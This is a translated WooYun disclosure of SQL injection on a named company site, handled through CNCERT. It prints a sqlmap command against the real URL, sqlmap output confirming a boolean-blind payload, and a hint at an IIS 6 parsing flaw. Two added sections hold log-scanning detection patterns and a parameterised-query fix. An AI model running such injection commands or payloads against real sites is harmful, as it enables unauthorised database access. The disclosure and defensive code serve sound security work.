Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0129269

Vulnerability title: A page on the Shenzhen Jishunda (深圳市吉顺达) site has a SQL injection vulnerability

Affected vendor: CNCERT National Internet Emergency Center (cncert国家互联网应急中心)

Vulnerability author: linkey

Submitted: 2015-07-26 22:15

Fixed: 2015-09-13 15:48

Published: 2015-09-13 15:48

Vulnerability type: SQL injection

Severity: Low

Self-assessed Rank: 5

Vulnerability status: handed over to a third-party partner organisation (CNCERT National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-07-26: Details sent to the vendor; awaiting vendor response
2015-07-30: Vendor confirmed; details disclosed to the vendor only
2015-08-09: Details disclosed to core white hats and domain experts
2015-08-19: Details disclosed to regular white hats
2015-08-29: Details disclosed to intern white hats
2015-09-13: Details disclosed to the public

Brief description:

I don't want to learn to drive yet; the cops would catch me.

Detailed description:

Same as always, as follows:

python sqlmap.py -u "http://www.jishunda.cn/News.asp?xwlb_id=36" --table


Output:

[04:57:27] [INFO] testing connection to the target url
[04:57:28] [INFO] testing if the url is stable, wait a few seconds
[04:57:59] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[04:58:01] [INFO] url is stable
[04:58:01] [INFO] testing if GET parameter 'xwlb_id' is dynamic
[04:58:01] [INFO] heuristics detected web page charset 'GB2312'
[04:58:01] [INFO] confirming that GET parameter 'xwlb_id' is dynamic
[04:58:01] [WARNING] GET parameter 'xwlb_id' appears to be not dynamic
[04:58:01] [WARNING] reflective value(s) found and filtering out
[04:58:01] [INFO] heuristic test shows that GET parameter 'xwlb_id' might be injectable (possible DBMS: Microsoft Access)
[04:58:01] [INFO] testing for SQL injection on GET parameter 'xwlb_id'
[04:58:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:58:02] [INFO] GET parameter 'xwlb_id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
parsed error message(s) showed that the back-end DBMS could be Microsoft Access. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[04:58:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[04:58:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[04:59:04] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[04:59:05] [INFO] target url appears to be UNION injectable with 4 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[04:59:40] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[04:59:41] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. --dbms=mysql)
[04:59:41] [INFO] checking if the injection point on GET parameter 'xwlb_id' is a false positive
GET parameter 'xwlb_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 46 HTTP(s) requests:


Conclusion:

---
Place: GET
Parameter: xwlb_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: xwlb_id=36 AND 3949=3949
---
[04:59:46] [INFO] testing Microsoft Access
[05:00:10] [INFO] confirming Microsoft Access
[05:00:10] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[05:00:10] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[05:00:10] [INFO] fetching number of tables for database 'Microsoft_Access_masterdb'
[05:00:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[05:00:10] [INFO] retrieved:
[05:00:10] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
[05:00:10] [WARNING] unable to retrieve the number of tables for database 'Microsoft_Access_masterdb'
[05:00:10] [ERROR] cannot retrieve table names, back-end DBMS is Access


There may also be the IIS 6 file-parsing vulnerability; the engineers can look into that themselves.
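The sqlmap run above leaves a recognisable trace on the server side: a parameter the application only ever uses as a whole number (xwlb_id) suddenly carrying tautologies such as `AND 3949=3949` or UNION ... SELECT fragments, dozens of times from one client within a few minutes. As an added example (not part of the original report), the Python below shows how a defender could pick that pattern out of IIS W3C logs. The log excerpt is constructed sample data; the field layout, client addresses and user-agent strings are assumptions, as is the INTEGER_PARAMS allow-list.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS 6.0 W3C extended log excerpt (sample data, not taken from the report).
# Field layout assumed: date time s-ip cs-method cs-uri-stem cs-uri-query s-port
#                       cs-username c-ip cs(User-Agent) sc-status
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2015-07-26 04:58:01 10.0.0.5 GET /News.asp xwlb_id=36 80 - 198.51.100.7 sqlmap/1.0 200
2015-07-26 04:58:01 10.0.0.5 GET /News.asp xwlb_id=36%20AND%203949=3949 80 - 198.51.100.7 sqlmap/1.0 200
2015-07-26 04:58:02 10.0.0.5 GET /News.asp xwlb_id=36%20AND%203949=3950 80 - 198.51.100.7 sqlmap/1.0 200
2015-07-26 04:58:30 10.0.0.5 GET /News.asp xwlb_id=36%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL 80 - 198.51.100.7 sqlmap/1.0 500
2015-07-26 05:01:00 10.0.0.5 GET /News.asp xwlb_id=37 80 - 203.0.113.9 Mozilla/5.0+(Windows+NT+6.1) 200
"""

# Parameters the application only ever uses as whole numbers (assumption drawn from News.asp?xwlb_id=36).
INTEGER_PARAMS = {"xwlb_id"}

# Tautology probes such as "AND 3949=3949" (boolean-based blind) and UNION ... SELECT fragments.
PROBE_RE = re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+\b|\bUNION\b.*\bSELECT\b", re.IGNORECASE)


def parse_line(line):
    """Split one W3C log line into the fields we need; directives and short lines give None."""
    if not line.strip() or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < 11:
        return None
    return {
        "time": parts[0] + " " + parts[1],
        "method": parts[3],
        "stem": parts[4],
        "query": parts[5],
        "client": parts[8],
        "agent": parts[9],
        "status": parts[10],
    }


def classify_request(rec):
    """Return a list of findings for one request record (empty list means nothing suspicious)."""
    findings = []
    if rec["query"] == "-":
        return findings
    # parse_qs percent-decodes the values, so "%20AND%20" becomes " AND ".
    for name, values in parse_qs(rec["query"], keep_blank_values=True).items():
        for value in values:
            if name in INTEGER_PARAMS and not re.fullmatch(r"-?\d+", value):
                findings.append(f"non-integer value for {name}: {value!r}")
            if PROBE_RE.search(value):
                findings.append(f"SQL probe pattern in {name}: {value!r}")
    return findings


def scan_log(text):
    """Return (client, time, stem, findings) for every request with at least one finding."""
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        findings = classify_request(rec)
        if findings:
            alerts.append((rec["client"], rec["time"], rec["stem"], findings))
    return alerts


def suspicious_clients(alerts, threshold=2):
    """Clients with at least `threshold` flagged requests: one odd value may be a typo, a series is a scan."""
    counts = {}
    for client, _, _, _ in alerts:
        counts[client] = counts.get(client, 0) + 1
    return {client for client, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for client, when, stem, findings in found:
        print(when, client, stem, "; ".join(findings))
    print("clients worth investigating:", sorted(suspicious_clients(found)))
```

The type check on xwlb_id is the more robust of the two rules: a probe regex can be evaded by encoding tricks, but a value that is not an integer for a parameter that is always an integer is wrong regardless of how it was spelled, and the same check is what the application itself should enforce before the value reaches the database.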

Proof of vulnerability:

Same as in the detailed description above.

Screenshot attached:

~UQ35677%4W$`3LPZ$VZQ9Y.jpg


Fix recommendation:

Filter the input... the engineers can work it out.
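The fix the report hints at ("filter the input") has two parts a defender would want to see side by side: validating that xwlb_id is the integer the page expects, and handing it to the database as a bound parameter rather than splicing it into the SQL text. The Python below is an added example, not code from the report or from the affected site; it uses an in-memory SQLite table as a stand-in for the Access database, and the table name, columns and rows are constructed for the example. The vulnerable function reproduces the boolean-blind oracle sqlmap reported: the on-page payload `36 AND 3949=3949` returns the normal rows while `36 AND 3949=3950` returns none, and the hardened function refuses both before any SQL is built.

```python
import re
import sqlite3


def make_db():
    """In-memory SQLite stand-in for the site's Access database (constructed sample rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, xwlb_id INTEGER, title TEXT)")
    conn.executemany(
        "INSERT INTO news (xwlb_id, title) VALUES (?, ?)",
        [(36, "Category 36 news A"), (36, "Category 36 news B"), (37, "Category 37 news")],
    )
    return conn


def list_news_vulnerable(conn, raw_xwlb_id):
    """The pattern behind the finding: the query-string value is concatenated into the SQL text."""
    sql = "SELECT title FROM news WHERE xwlb_id=" + raw_xwlb_id
    return [row[0] for row in conn.execute(sql)]


def validate_id(raw):
    """Allow-list check: the category id must be a plain non-negative integer of bounded length."""
    if not re.fullmatch(r"\d{1,9}", raw):
        raise ValueError(f"rejected xwlb_id value: {raw!r}")
    return int(raw)


def list_news_safe(conn, raw_xwlb_id):
    """Hardened form: validate first, then bind the value so it can never be parsed as SQL."""
    xwlb_id = validate_id(raw_xwlb_id)
    rows = conn.execute("SELECT title FROM news WHERE xwlb_id=?", (xwlb_id,))
    return [row[0] for row in rows]


def rejects(raw):
    """True if the allow-list check refuses the value (shows the probes no longer reach SQL)."""
    try:
        validate_id(raw)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    conn = make_db()
    true_probe, false_probe = "36 AND 3949=3949", "36 AND 3949=3950"
    print("vulnerable, true probe :", list_news_vulnerable(conn, true_probe))
    print("vulnerable, false probe:", list_news_vulnerable(conn, false_probe))
    print("safe, normal value     :", list_news_safe(conn, "36"))
    print("safe rejects probes    :", rejects(true_probe), rejects(false_probe))
```

The difference between the two vulnerable results is exactly the page-content oracle that lets a boolean-blind test succeed; once the value is bound as a parameter there is no SQL for the tautology to attach to. In classic ASP the bound form is an ADODB.Command object with the value in its Parameters collection instead of a concatenated string, and the integer check is worth keeping on its own, since it also turns malformed requests into a clean rejection that is easy to log and count.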

Copyright notice: when reposting, please credit the source: linkey@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2015-07-30 15:46

Vendor reply:

CNVD has confirmed and reproduced the described issue; it has been passed via CNCERT to the Guangdong branch center, which will follow up by attempting to coordinate remediation with the organisation operating the site.

Latest status:

None yet